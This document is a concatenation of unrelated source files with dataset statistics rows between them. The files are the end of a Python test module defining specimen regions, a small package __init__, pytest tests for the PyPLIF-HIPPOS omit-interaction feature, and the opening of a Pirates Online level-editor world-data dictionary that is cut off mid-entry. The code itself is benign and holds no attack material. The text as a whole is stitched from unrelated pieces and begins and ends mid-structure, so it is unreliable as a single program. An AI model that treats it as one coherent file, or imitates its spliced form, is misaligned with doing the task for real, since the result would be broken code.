region.elements.append(element)
region.regionType = RegionType.REGION_TYPE_BOX
parameters = [-10000000000.0, 10000000000.0, -10000000000.0, 10000000000.0, 0.0, 20000000000.0]
region.regionDimensions = RegionDimensions.RegionDimensionsBox(parameters)
specimen.regions.append(region)
region = Region.Region()
region.numberElements = 1
element = Element.Element(6)
region.elements.append(element)
region.regionType = RegionType.REGION_TYPE_BOX
parameters = (-10.0, 10.0, -10.0, 10.0, 0.0, 20.0)
region.regionDimensions = RegionDimensions.RegionDimensionsBox(parameters)
specimen.regions.append(region)
elif title == "AlMgBulk5keV_version_1_1_1":
specimen.numberRegions = 3
specimen.version = Version.Version(1, 1, 1)
region = Region.Region()
region.numberElements = 2
element = Element.Element(12, 0.5)
region.elements.append(element)
element = Element.Element(13, 0.5)
region.elements.append(element)
region.regionType = RegionType.REGION_TYPE_BOX
parameters = [-10000000000.0, 10000000000.0, -10000000000.0, 10000000000.0, 0.0, 20000000000.0]
region.regionDimensions = RegionDimensions.RegionDimensionsBox(parameters)
specimen.regions.append(region)
region = Region.Region()
region.numberElements = 1
element = Element.Element(6)
region.elements.append(element)
region.regionType = RegionType.REGION_TYPE_CYLINDER
parameters = [0.0, -5000.0, 0.0, 0.0, 1.0, -0.7, 10000.0, 100.0]
region.regionDimensions = RegionDimensions.RegionDimensionsCylinder(parameters)
specimen.regions.append(region)
region = Region.Region()
region.numberElements = 1
element = Element.Element(79)
region.elements.append(element)
region.regionType = RegionType.REGION_TYPE_SPHERE
parameters = [0.0, 0.0, 101.0, 100.0]
region.regionDimensions = RegionDimensions.RegionDimensionsSphere(parameters)
specimen.regions.append(region)
elif title == "AlMgBulk5keV_version_1_2_0":
specimen.numberRegions = 3
specimen.version = Version.Version(1, 2, 0)
region = Region.Region()
region.numberElements = 2
element = Element.Element(14, 0.4)
region.elements.append(element)
element = Element.Element(15, 0.6)
region.elements.append(element)
region.regionMassDensity_g_cm3 = 23.0
region.regionType = RegionType.REGION_TYPE_BOX
parameters = [-2000000000.0, 6000000000.0, -4000000000.0, 5000000000.0, 0.8, 70000.0]
region.regionDimensions = RegionDimensions.RegionDimensionsBox(parameters)
specimen.regions.append(region)
region = Region.Region()
region.numberElements = 1
element = Element.Element(7)
region.elements.append(element)
region.regionType = RegionType.REGION_TYPE_CYLINDER
parameters = [0.4, -8000.0, 0.9, 0.1, 0.6, -0.8, 50000.0, 700.0]
region.regionDimensions = RegionDimensions.RegionDimensionsCylinder(parameters)
specimen.regions.append(region)
region = Region.Region()
region.numberElements = 1
element = Element.Element(56)
region.elements.append(element)
region.regionType = RegionType.REGION_TYPE_SPHERE
parameters = [0.5, 0.6, 102.0, 101.0]
region.regionDimensions = RegionDimensions.RegionDimensionsSphere(parameters)
specimen.regions.append(region)
elif title == "AlMgBulk5keV_version_1_2_1":
specimen.numberRegions = 3
specimen.version = Version.Version(1, 2, 1)
region = Region.Region()
region.numberElements = 2
element = Element.Element(14, 0.4)
region.elements.append(element)
element = Element.Element(15, 0.6)
region.elements.append(element)
region.regionMassDensity_g_cm3 = 23.0
region.regionType = RegionType.REGION_TYPE_BOX
parameters = [-2000000000.0, 6000000000.0, -4000000000.0, 5000000000.0, 0.8, 70000.0]
region.regionDimensions = RegionDimensions.RegionDimensionsBox(parameters)
specimen.regions.append(region)
region = Region.Region()
region.numberElements = 1
element = Element.Element(7)
region.elements.append(element)
region.regionType = RegionType.REGION_TYPE_CYLINDER
parameters = [0.4, -8000.0, 0.9, 0.1, 0.6, -0.8, 50000.0, 700.0]
region.regionDimensions = RegionDimensions.RegionDimensionsCylinder(parameters)
specimen.regions.append(region)
region = Region.Region()
region.numberElements = 1
element = Element.Element(56)
region.elements.append(element)
region.regionType = RegionType.REGION_TYPE_SPHERE
parameters = [0.5, 0.6, 102.0, 101.0]
region.regionDimensions = RegionDimensions.RegionDimensionsSphere(parameters)
specimen.regions.append(region)
elif title == "AlMgBulk5keV_version_1_4_1":
specimen.numberRegions = 3
specimen.version = Version.Version(1, 4, 1)
region = Region.Region()
region.numberElements = 2
element = Element.Element(14, 0.4)
region.elements.append(element)
element = Element.Element(15, 0.6)
region.elements.append(element)
region.regionMassDensity_g_cm3 = 23.0
region.regionType = RegionType.REGION_TYPE_BOX
parameters = [-2000000000.0, 6000000000.0, -4000000000.0, 5000000000.0, 0.8, 70000.0]
region.regionDimensions = RegionDimensions.RegionDimensionsBox(parameters)
specimen.regions.append(region)
region = Region.Region()
region.numberElements = 1
element = Element.Element(7)
region.elements.append(element)
region.regionType = RegionType.REGION_TYPE_CYLINDER
parameters = [0.4, -8000.0, 0.9, 0.1, 0.6, -0.8, 50000.0, 700.0]
region.regionDimensions = RegionDimensions.RegionDimensionsCylinder(parameters)
specimen.regions.append(region)
region = Region.Region()
region.numberElements = 1
element = Element.Element(56)
region.elements.append(element)
region.regionType = RegionType.REGION_TYPE_SPHERE
parameters = [0.5, 0.6, 102.0, 101.0]
region.regionDimensions = RegionDimensions.RegionDimensionsSphere(parameters)
specimen.regions.append(region)
return specimen
if __name__ == '__main__': #pragma: no cover
import nose
nose.runmodule()
| 43.433447
| 110
| 0.663576
| 3,839
| 38,178
| 6.51628
| 0.063558
| 0.083147
| 0.052526
| 0.070155
| 0.9368
| 0.934482
| 0.932083
| 0.909338
| 0.901183
| 0.892669
| 0
| 0.049894
| 0.237205
| 38,178
| 878
| 111
| 43.482916
| 0.809113
| 0.031772
| 0
| 0.835866
| 0
| 0
| 0.020014
| 0.009365
| 0
| 0
| 0
| 0
| 0.206687
| 1
| 0.021277
| false
| 0
| 0.019757
| 0
| 0.044073
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b6b61045a3c1d433d3c3b8cf9566b675ebe2a99c
| 67
|
py
|
Python
|
speedy/src/java8speedy/__init__.py
|
ashrafizahra81/CodART
|
693e59d568b548edb2539d04cff1fd991de43124
|
[
"MIT"
] | 1
|
2022-02-04T11:09:08.000Z
|
2022-02-04T11:09:08.000Z
|
speedy/src/java8speedy/__init__.py
|
ashrafizahra81/CodART
|
693e59d568b548edb2539d04cff1fd991de43124
|
[
"MIT"
] | null | null | null |
speedy/src/java8speedy/__init__.py
|
ashrafizahra81/CodART
|
693e59d568b548edb2539d04cff1fd991de43124
|
[
"MIT"
] | null | null | null |
from .print_tree import print_tree
from .benchmark import benchmark
| 33.5
| 34
| 0.865672
| 10
| 67
| 5.6
| 0.5
| 0.321429
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.104478
| 67
| 2
| 35
| 33.5
| 0.933333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0.5
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 1
|
0
| 7
|
1e8a2fa776f5bd96393450257a891c27824bdb82
| 14,904
|
py
|
Python
|
tests/test_interactions/test_omit_interactions.py
|
radifar/PyPLIF-HIPPOS
|
95fc5dd81b900e84ae6f3368c4b70a08d17257dd
|
[
"HPND"
] | 13
|
2020-07-29T12:19:56.000Z
|
2022-02-07T04:48:19.000Z
|
tests/test_interactions/test_omit_interactions.py
|
radifar/PyPLIF-HIPPOS
|
95fc5dd81b900e84ae6f3368c4b70a08d17257dd
|
[
"HPND"
] | 5
|
2021-03-30T01:11:49.000Z
|
2021-09-13T11:49:35.000Z
|
tests/test_interactions/test_omit_interactions.py
|
radifar/PyPLIF-HIPPOS
|
95fc5dd81b900e84ae6f3368c4b70a08d17257dd
|
[
"HPND"
] | 5
|
2020-08-06T07:26:06.000Z
|
2021-10-30T17:16:39.000Z
|
"""
The tests for omit interaction feature
"""
import os
import sys
from collections import namedtuple
from pyplif_hippos import ParseConfig, hippos, similarity
def test_configuration_single_omit_interaction(tmpdir):
"""Test configuration for omitting specific interaction"""
# Arrange
config_file = tmpdir.mkdir("sub").join("config.txt")
config_file.write(
"""
docking_method plants # plants or vina
docking_conf plants-003.conf
similarity_coef tanimoto mcconnaughey
full_ref 00000100000000000000000000000000000100000000000001000000000000010000001000000000000000000001000000000000000000000000000000101000000000000000000101000000000010000 00010101000000000000000000000000000100000000000001010000000000010000001000000000000010000000000000000000000001011000001000001000000000000000000101000000000000000 00010101000000100000000000000000000100000000000001010100100000010000001000000000000010000001000000000000010000000000100000101010000000000000000001000000000000000
residue_name ARG116 GLU117 LEU132 LYS148 ASP149 ARG150 ARG154 TRP177 SER178 ILE221 ARG223 THR224 GLU226 ALA245 HIS273 GLU275 GLU276 ARG292 ASP294 GLY347 ARG374 TRP408 TYR409
residue_number 40 41 56 72 73 74 78 101 102 145 147 148 150 169 197 199 200 216 218 271 298 332 333
omit_interaction hydrophobic ARG223
full_outfile plants_full_ifp.csv
sim_outfile plants_similarity.csv
logfile plants.log
"""
)
arg = os.path.join(config_file.dirname, config_file.basename)
if len(sys.argv) > 1:
sys.argv[1] = arg
else:
sys.argv.append(arg)
# Act
hippos_config = ParseConfig()
hippos_config.parse_config()
omit_interaction = hippos_config.omit_interaction[0]
# Assert
assert omit_interaction.interaction_type == "hydrophobic"
assert omit_interaction.res_name == ["ARG223"]
def test_configuration_omit_multiple_residue_interaction(tmpdir):
"""Test configuration for omitting multiple residue interaction"""
# Arrange
config_file = tmpdir.mkdir("sub").join("config.txt")
config_file.write(
"""
docking_method plants # plants or vina
docking_conf plants-003.conf
similarity_coef tanimoto mcconnaughey
full_ref 00000100000000000000000000000000000100000000000001000000000000010000001000000000000000000001000000000000000000000000000000101000000000000000000101000000000010000 00010101000000000000000000000000000100000000000001010000000000010000001000000000000010000000000000000000000001011000001000001000000000000000000101000000000000000 00010101000000100000000000000000000100000000000001010100100000010000001000000000000010000001000000000000010000000000100000101010000000000000000001000000000000000
residue_name ARG116 GLU117 LEU132 LYS148 ASP149 ARG150 ARG154 TRP177 SER178 ILE221 ARG223 THR224 GLU226 ALA245 HIS273 GLU275 GLU276 ARG292 ASP294 GLY347 ARG374 TRP408 TYR409
residue_number 40 41 56 72 73 74 78 101 102 145 147 148 150 169 197 199 200 216 218 271 298 332 333
omit_interaction hydrophobic ARG150 TRP177 ARG223
full_outfile plants_full_ifp.csv
sim_outfile plants_similarity.csv
logfile plants.log
"""
)
arg = os.path.join(config_file.dirname, config_file.basename)
if len(sys.argv) > 1:
sys.argv[1] = arg
else:
sys.argv.append(arg)
# Act
hippos_config = ParseConfig()
hippos_config.parse_config()
omit_interaction = hippos_config.omit_interaction[0]
# Assert
assert omit_interaction.interaction_type == "hydrophobic"
assert omit_interaction.res_name == ["ARG150", "TRP177", "ARG223"]
def test_configuration_omit_multiple_interaction_type(tmpdir):
"""Test configuration for omitting multiple interaction type"""
# Arrange
config_file = tmpdir.mkdir("sub").join("config.txt")
config_file.write(
"""
docking_method plants # plants or vina
docking_conf plants-003.conf
similarity_coef tanimoto mcconnaughey
full_ref 00000100000000000000000000000000000100000000000001000000000000010000001000000000000000000001000000000000000000000000000000101000000000000000000101000000000010000 00010101000000000000000000000000000100000000000001010000000000010000001000000000000010000000000000000000000001011000001000001000000000000000000101000000000000000 00010101000000100000000000000000000100000000000001010100100000010000001000000000000010000001000000000000010000000000100000101010000000000000000001000000000000000
residue_name ARG116 GLU117 LEU132 LYS148 ASP149 ARG150 ARG154 TRP177 SER178 ILE221 ARG223 THR224 GLU226 ALA245 HIS273 GLU275 GLU276 ARG292 ASP294 GLY347 ARG374 TRP408 TYR409
residue_number 40 41 56 72 73 74 78 101 102 145 147 148 150 169 197 199 200 216 218 271 298 332 333
omit_interaction hydrophobic ARG223
omit_interaction h_bond ARG292
full_outfile plants_full_ifp.csv
sim_outfile plants_similarity.csv
logfile plants.log
"""
)
arg = os.path.join(config_file.dirname, config_file.basename)
if len(sys.argv) > 1:
sys.argv[1] = arg
else:
sys.argv.append(arg)
# Act
hippos_config = ParseConfig()
hippos_config.parse_config()
omit_interaction_1 = hippos_config.omit_interaction[0]
omit_interaction_2 = hippos_config.omit_interaction[1]
# Assert
assert omit_interaction_1.interaction_type == "hydrophobic"
assert omit_interaction_1.res_name == ["ARG223"]
assert omit_interaction_2.interaction_type == "h_bond"
assert omit_interaction_2.res_name == ["ARG292"]
def test_configuration_long_interaction_type(tmpdir):
"""Test configuration checking all long interaction_type"""
# Arrange
config_file = tmpdir.mkdir("sub").join("config.txt")
config_file.write(
"""
docking_method plants # plants or vina
docking_conf plants-003.conf
similarity_coef tanimoto mcconnaughey
full_ref 00000100000000000000000000000000000100000000000001000000000000010000001000000000000000000001000000000000000000000000000000101000000000000000000101000000000010000 00010101000000000000000000000000000100000000000001010000000000010000001000000000000010000000000000000000000001011000001000001000000000000000000101000000000000000 00010101000000100000000000000000000100000000000001010100100000010000001000000000000010000001000000000000010000000000100000101010000000000000000001000000000000000
residue_name ARG116 GLU117 LEU132 LYS148 ASP149 ARG150 ARG154 TRP177 SER178 ILE221 ARG223 THR224 GLU226 ALA245 HIS273 GLU275 GLU276 ARG292 ASP294 GLY347 ARG374 TRP408 TYR409
residue_number 40 41 56 72 73 74 78 101 102 145 147 148 150 169 197 199 200 216 218 271 298 332 333
omit_interaction hydrophobic ARG116
omit_interaction aromatic GLU117
omit_interaction h_bond LEU132
omit_interaction electrostatic LYS148
omit_interaction h_bond_donor ASP149
omit_interaction h_bond_acceptor ARG150
omit_interaction electrostatic_positive ARG154
omit_interaction electrostatic_negative TRP177
omit_interaction aromatic_facetoface SER178
omit_interaction aromatic_edgetoface ILE221
full_outfile plants_full_ifp.csv
sim_outfile plants_similarity.csv
logfile plants.log
"""
)
arg = os.path.join(config_file.dirname, config_file.basename)
if len(sys.argv) > 1:
sys.argv[1] = arg
else:
sys.argv.append(arg)
# Act
hippos_config = ParseConfig()
hippos_config.parse_config()
omit_interaction_1 = hippos_config.omit_interaction[0]
omit_interaction_2 = hippos_config.omit_interaction[1]
omit_interaction_3 = hippos_config.omit_interaction[2]
omit_interaction_4 = hippos_config.omit_interaction[3]
omit_interaction_5 = hippos_config.omit_interaction[4]
omit_interaction_6 = hippos_config.omit_interaction[5]
omit_interaction_7 = hippos_config.omit_interaction[6]
omit_interaction_8 = hippos_config.omit_interaction[7]
omit_interaction_9 = hippos_config.omit_interaction[8]
omit_interaction_10 = hippos_config.omit_interaction[9]
# Assert
assert omit_interaction_1.interaction_type == "hydrophobic"
assert omit_interaction_1.res_name == ["ARG116"]
assert omit_interaction_2.interaction_type == "aromatic"
assert omit_interaction_2.res_name == ["GLU117"]
assert omit_interaction_3.interaction_type == "h_bond"
assert omit_interaction_3.res_name == ["LEU132"]
assert omit_interaction_4.interaction_type == "electrostatic"
assert omit_interaction_4.res_name == ["LYS148"]
assert omit_interaction_5.interaction_type == "h_bond_donor"
assert omit_interaction_5.res_name == ["ASP149"]
assert omit_interaction_6.interaction_type == "h_bond_acceptor"
assert omit_interaction_6.res_name == ["ARG150"]
assert omit_interaction_7.interaction_type == "electrostatic_positive"
assert omit_interaction_7.res_name == ["ARG154"]
assert omit_interaction_8.interaction_type == "electrostatic_negative"
assert omit_interaction_8.res_name == ["TRP177"]
assert omit_interaction_9.interaction_type == "aromatic_facetoface"
assert omit_interaction_9.res_name == ["SER178"]
assert omit_interaction_10.interaction_type == "aromatic_edgetoface"
assert omit_interaction_10.res_name == ["ILE221"]
def test_configuration_short_interaction_type(tmpdir):
"""Test configuration checking all short interaction_type"""
# Arrange
config_file = tmpdir.mkdir("sub").join("config.txt")
config_file.write(
"""
docking_method plants # plants or vina
docking_conf plants-003.conf
similarity_coef tanimoto mcconnaughey
full_ref 00000100000000000000000000000000000100000000000001000000000000010000001000000000000000000001000000000000000000000000000000101000000000000000000101000000000010000 00010101000000000000000000000000000100000000000001010000000000010000001000000000000010000000000000000000000001011000001000001000000000000000000101000000000000000 00010101000000100000000000000000000100000000000001010100100000010000001000000000000010000001000000000000010000000000100000101010000000000000000001000000000000000
residue_name ARG116 GLU117 LEU132 LYS148 ASP149 ARG150 ARG154 TRP177 SER178 ILE221 ARG223 THR224 GLU226 ALA245 HIS273 GLU275 GLU276 ARG292 ASP294 GLY347 ARG374 TRP408 TYR409
residue_number 40 41 56 72 73 74 78 101 102 145 147 148 150 169 197 199 200 216 218 271 298 332 333
omit_interaction HPB ARG116
omit_interaction ARM GLU117
omit_interaction HBD LEU132
omit_interaction ELE LYS148
omit_interaction HBD_DON ASP149
omit_interaction HBD_ACC ARG150
omit_interaction ELE_POS ARG154
omit_interaction ELE_NEG TRP177
omit_interaction ARM_F2F SER178
omit_interaction ARM_E2F ILE221
full_outfile plants_full_ifp.csv
sim_outfile plants_similarity.csv
logfile plants.log
"""
)
arg = os.path.join(config_file.dirname, config_file.basename)
if len(sys.argv) > 1:
sys.argv[1] = arg
else:
sys.argv.append(arg)
# Act
hippos_config = ParseConfig()
hippos_config.parse_config()
omit_interaction_1 = hippos_config.omit_interaction[0]
omit_interaction_2 = hippos_config.omit_interaction[1]
omit_interaction_3 = hippos_config.omit_interaction[2]
omit_interaction_4 = hippos_config.omit_interaction[3]
omit_interaction_5 = hippos_config.omit_interaction[4]
omit_interaction_6 = hippos_config.omit_interaction[5]
omit_interaction_7 = hippos_config.omit_interaction[6]
omit_interaction_8 = hippos_config.omit_interaction[7]
omit_interaction_9 = hippos_config.omit_interaction[8]
omit_interaction_10 = hippos_config.omit_interaction[9]
# Assert
assert omit_interaction_1.interaction_type == "hydrophobic"
assert omit_interaction_1.res_name == ["ARG116"]
assert omit_interaction_2.interaction_type == "aromatic"
assert omit_interaction_2.res_name == ["GLU117"]
assert omit_interaction_3.interaction_type == "h_bond"
assert omit_interaction_3.res_name == ["LEU132"]
assert omit_interaction_4.interaction_type == "electrostatic"
assert omit_interaction_4.res_name == ["LYS148"]
assert omit_interaction_5.interaction_type == "h_bond_donor"
assert omit_interaction_5.res_name == ["ASP149"]
assert omit_interaction_6.interaction_type == "h_bond_acceptor"
assert omit_interaction_6.res_name == ["ARG150"]
assert omit_interaction_7.interaction_type == "electrostatic_positive"
assert omit_interaction_7.res_name == ["ARG154"]
assert omit_interaction_8.interaction_type == "electrostatic_negative"
assert omit_interaction_8.res_name == ["TRP177"]
assert omit_interaction_9.interaction_type == "aromatic_facetoface"
assert omit_interaction_9.res_name == ["SER178"]
assert omit_interaction_10.interaction_type == "aromatic_edgetoface"
assert omit_interaction_10.res_name == ["ILE221"]
def test_replace_bit_char():
"""Test bit replacement function for omitted residue"""
# Arrange
bitstring = "1000001"
omit_hydrophobic = [1, 0, 0, 0, 0, 0, 0]
omit_aromatic = [0, 1, 1, 0, 0, 0, 0]
omit_h_bond = [0, 0, 0, 1, 1, 0, 0]
omit_electrostatic = [0, 0, 0, 0, 0, 1, 1]
omit_h_bond_donor = [0, 0, 0, 1, 0, 0, 0]
omit_h_bond_acceptor = [0, 0, 0, 0, 1, 0, 0]
omit_electrostatic_positive = [0, 0, 0, 0, 0, 1, 0]
omit_electrostatic_negative = [0, 0, 0, 0, 0, 0, 1]
omit_aromatic_facetoface = [0, 1, 0, 0, 0, 0, 0]
omit_aromatic_edgetoface = [0, 0, 1, 0, 0, 0, 0]
# Act
bitstring_1 = hippos.replace_bit_char(bitstring, omit_hydrophobic)
bitstring_2 = hippos.replace_bit_char(bitstring, omit_aromatic)
bitstring_3 = hippos.replace_bit_char(bitstring, omit_h_bond)
bitstring_4 = hippos.replace_bit_char(bitstring, omit_electrostatic)
bitstring_5 = hippos.replace_bit_char(bitstring, omit_h_bond_donor)
bitstring_6 = hippos.replace_bit_char(bitstring, omit_h_bond_acceptor)
bitstring_7 = hippos.replace_bit_char(bitstring, omit_electrostatic_positive)
bitstring_8 = hippos.replace_bit_char(bitstring, omit_electrostatic_negative)
bitstring_9 = hippos.replace_bit_char(bitstring, omit_aromatic_facetoface)
bitstring_10 = hippos.replace_bit_char(bitstring, omit_aromatic_edgetoface)
# Assert
assert bitstring_1 == "n000001"
assert bitstring_2 == "1nn0001"
assert bitstring_3 == "100nn01"
assert bitstring_4 == "10000nn"
assert bitstring_5 == "100n001"
assert bitstring_6 == "1000n01"
assert bitstring_7 == "10000n1"
assert bitstring_8 == "100000n"
assert bitstring_9 == "1n00001"
assert bitstring_10 == "10n0001"
def test_cleanup_omitted_interaction():
"""Test for bitstring preparation prior to similarity calculation"""
# Arrange
refbit = "000001000101"
tgtbit = "11n00n000011"
# Act
clean_refbit, clean_tgtbit = similarity.clean_omitted_interactions(refbit, tgtbit)
# Assert
assert clean_refbit == "0000000101"
assert clean_tgtbit == "1100000011"
| 39.638298
| 495
| 0.790526
| 1,687
| 14,904
| 6.688797
| 0.108477
| 0.162177
| 0.08933
| 0.057426
| 0.850053
| 0.844647
| 0.814073
| 0.775611
| 0.765509
| 0.765509
| 0
| 0.278371
| 0.145062
| 14,904
| 375
| 496
| 39.744
| 0.607205
| 0.037976
| 0
| 0.662722
| 0
| 0
| 0.080014
| 0.010431
| 0
| 0
| 0
| 0
| 0.35503
| 1
| 0.04142
| false
| 0
| 0.023669
| 0
| 0.065089
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
94e5241d69b771f3a6a6262db895824ca5e53381
| 136,125
|
py
|
Python
|
pirates/leveleditor/worldData/CatacombsTEST.py
|
Willy5s/Pirates-Online-Rewritten
|
7434cf98d9b7c837d57c181e5dabd02ddf98acb7
|
[
"BSD-3-Clause"
] | 81
|
2018-04-08T18:14:24.000Z
|
2022-01-11T07:22:15.000Z
|
pirates/leveleditor/worldData/CatacombsTEST.py
|
Willy5s/Pirates-Online-Rewritten
|
7434cf98d9b7c837d57c181e5dabd02ddf98acb7
|
[
"BSD-3-Clause"
] | 4
|
2018-09-13T20:41:22.000Z
|
2022-01-08T06:57:00.000Z
|
pirates/leveleditor/worldData/CatacombsTEST.py
|
Willy5s/Pirates-Online-Rewritten
|
7434cf98d9b7c837d57c181e5dabd02ddf98acb7
|
[
"BSD-3-Clause"
] | 26
|
2018-05-26T12:49:27.000Z
|
2021-09-11T09:11:59.000Z
|
from pandac.PandaModules import Point3, VBase3, Vec4
objectStruct = {'Adj Table': {'1235611035.98akelts': ['1235611061.09akelts', '1235611117.05akelts', '1235611119.02akelts', '1235611119.33akelts'],'1235611061.09akelts': ['1235611035.98akelts', '1235611121.0akelts'],'1235611115.91akelts': ['1235611121.0akelts', '1235611116.59akelts'],'1235611116.59akelts': ['1235611115.91akelts'],'1235611117.05akelts': ['1235611035.98akelts', '1235611117.31akelts'],'1235611117.31akelts': ['1235611117.05akelts', '1235611117.69akelts'],'1235611117.69akelts': ['1235611117.31akelts', '1236293632.0akelts'],'1235611119.02akelts': ['1235611035.98akelts', '1235611795.97akelts', '1235611792.13akelts'],'1235611119.33akelts': ['1235611035.98akelts', '1235611119.91akelts', '1235611519.63akelts'],'1235611119.91akelts': ['1235611119.33akelts', '1235611120.45akelts'],'1235611120.45akelts': ['1235611119.91akelts', '1235611361.5akelts'],'1235611121.0akelts': ['1235611061.09akelts', '1235611115.91akelts'],'1235611344.81akelts': ['1235611352.94akelts', '1235611353.63akelts'],'1235611347.08akelts': ['1235611361.5akelts', '1235611348.2akelts'],'1235611348.2akelts': ['1235611347.08akelts', '1235611348.83akelts'],'1235611348.83akelts': ['1235611348.2akelts'],'1235611352.23akelts': ['1235611353.63akelts'],'1235611352.94akelts': ['1235611361.5akelts', '1235611344.81akelts', '1235611534.09akelts'],'1235611353.63akelts': ['1235611344.81akelts', '1235611352.23akelts'],'1235611361.5akelts': ['1235611352.94akelts', '1235611347.08akelts', '1235611120.45akelts'],'1235611519.63akelts': ['1235611119.33akelts', '1235611530.08akelts'],'1235611528.14akelts': ['1235611528.78akelts', '1235611534.09akelts'],'1235611528.78akelts': ['1235611529.42akelts', '1235611528.14akelts'],'1235611529.42akelts': ['1235611528.78akelts', '1235611746.08akelts'],'1235611530.08akelts': ['1235611519.63akelts', '1235611530.73akelts'],'1235611530.73akelts': ['1235611531.39akelts', '1235611530.08akelts'],'1235611531.39akelts': ['1235611532.06akelts', '1235611530.73akelts'],'1235611532.06akelts': ['1235611531.39akelts', '1235611532.73akelts', '1235611533.41akelts'],'1235611532.73akelts': ['1235611532.06akelts'],'1235611533.41akelts': ['1235611532.06akelts', '1235611746.08akelts'],'1235611534.09akelts': ['1235611352.94akelts', '1235611528.14akelts'],'1235611746.08akelts': ['1235611529.42akelts', '1235611533.41akelts'],'1235611775.94akelts': ['1235611795.97akelts', '1235611787.47akelts'],'1235611777.48akelts': ['1235611787.47akelts', '1235611781.22akelts', '1235611784.77akelts'],'1235611781.22akelts': ['1235611777.48akelts'],'1235611782.08akelts': ['1235611787.47akelts', '1235611783.0akelts'],'1235611783.0akelts': ['1235611783.89akelts', '1235611786.56akelts', '1235611782.08akelts'],'1235611783.89akelts': ['1235611783.0akelts', '1235611785.67akelts'],'1235611784.77akelts': ['1235611777.48akelts', '1235611795.0akelts'],'1235611785.67akelts': ['1235611783.89akelts'],'1235611786.56akelts': ['1235611783.0akelts', '1235611788.39akelts'],'1235611787.47akelts': ['1235611777.48akelts', '1235611782.08akelts', '1235611775.94akelts'],'1235611788.39akelts': ['1235611786.56akelts', '1235611793.08akelts', '1235611789.31akelts'],'1235611789.31akelts': ['1235611788.39akelts', '1235611790.25akelts'],'1235611790.25akelts': ['1235611791.19akelts', '1235611789.31akelts'],'1235611791.19akelts': ['1235611790.25akelts', '1235611792.13akelts'],'1235611792.13akelts': ['1235611791.19akelts', '1235611119.02akelts'],'1235611793.08akelts': ['1235611788.39akelts', '1235611794.03akelts'],'1235611794.03akelts': ['1235611793.08akelts'],'1235611795.0akelts': ['1235611784.77akelts'],'1235611795.97akelts': ['1235611119.02akelts', '1235611775.94akelts'],'1236293632.0akelts': ['1235611117.69akelts', '1236293632.0akelts2'],'1236293632.0akelts2': ['1236293632.0akelts']},'AmbientColors': {0: Vec4(0.447059, 0.529412, 0.647059, 1),2: Vec4(0.537255, 0.494118, 0.627451, 1),4: Vec4(0.4, 0.447059, 0.494118, 1),6: Vec4(0.439216, 0.447059, 0.556863, 1),8: Vec4(0.388235, 0.419608, 0.537255, 1),12: Vec4(0.34, 0.28, 0.41, 1),13: Vec4(0.34, 0.28, 0.41, 1),16: Vec4(0.768627, 0, 0, 1)},'DirectionalColors': {0: Vec4(0.54902, 0.458824, 0.34902, 1),2: Vec4(0.458824, 0.458824, 0.364706, 1),4: Vec4(0.6, 0.337255, 0.0941176, 1),6: Vec4(0.458824, 0.478431, 0.447059, 1),8: Vec4(0.419608, 0.419608, 0.4, 1),12: Vec4(0.66, 0.76, 0.05, 1),13: Vec4(0.66, 0.76, 0.05, 1),16: Vec4(0, 0, 0, 1)},'FogColors': {-1: Vec4(0.0941176, 0.152941, 0.152941, 1),0: Vec4(0.294118, 0.2, 0.14902, 1),2: Vec4(0.6, 0.694118, 0.894118, 1),4: Vec4(0.294118, 0.176471, 0.14902, 1),6: Vec4(0.14902, 0.2, 0.34902, 1),8: Vec4(0.0470588, 0.0588235, 0.168627, 1),12: Vec4(0.1, 0.12, 0.03, 0),13: Vec4(0.1, 0.12, 0.03, 0),16: Vec4(0, 0, 1, 1)},'FogRanges': {-1: 0.0015,0: 9.999999747378752e-05,2: 9.999999747378752e-05,4: 9.999999747378752e-05,6: 9.999999747378752e-05,8: 0.00019999999494757503,12: 0.00025,13: 0.00025,16: 0.0015999999595806003},'Objects': {'1235605888.0akelts': {'Type': 'Island Game Area','Name': 'default','File': '','Instanced': False,'Minimap': False,'Objects': {'1235611035.98akelts': {'Type': 'Cave_Pieces','Hpr': Point3(0.0, 0.0, 0.0),'Objects': {'1235611036.02akelts': {'Type': 'Locator Node','Name': 'cave_connector_1','Hpr': VBase3(0.0, 0.0, 0.0),'Parent Uid': '1235611035.98akelts','Pos': Point3(100.0, -100.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)},'1235611036.03akelts': {'Type': 'Locator Node','Name': 'cave_connector_2','Hpr': VBase3(-90.0, 0.0, 0.0),'Parent Uid': '1235611035.98akelts','Pos': Point3(0.0, -200.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)},'1235611036.05akelts': {'Type': 'Locator Node','Name': 'cave_connector_3','Hpr': VBase3(-180.0, 0.0, 0.0),'Parent Uid': '1235611035.98akelts','Pos': Point3(-100.0, -100.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)},'1235611036.0akelts': {'Type': 'Locator Node','Name': 'cave_connector_0','Hpr': VBase3(90.0, 0.0, 0.0),'Parent Uid': '1235611035.98akelts','Pos': Point3(0.0, 0.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)},'1237574022.48akelts': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(-71.193, 0.0, 0.0),'Pos': Point3(-59.816, -138.874, -9.726),'Scale': VBase3(1.393, 1.393, 1.393),'VisSize': 'Large','VisZone': '1_1235611035.98akelts','Visual': {'Model': 'models/props/pir_m_prp_cav_rockGroup_d'}},'1237574300.08akelts': 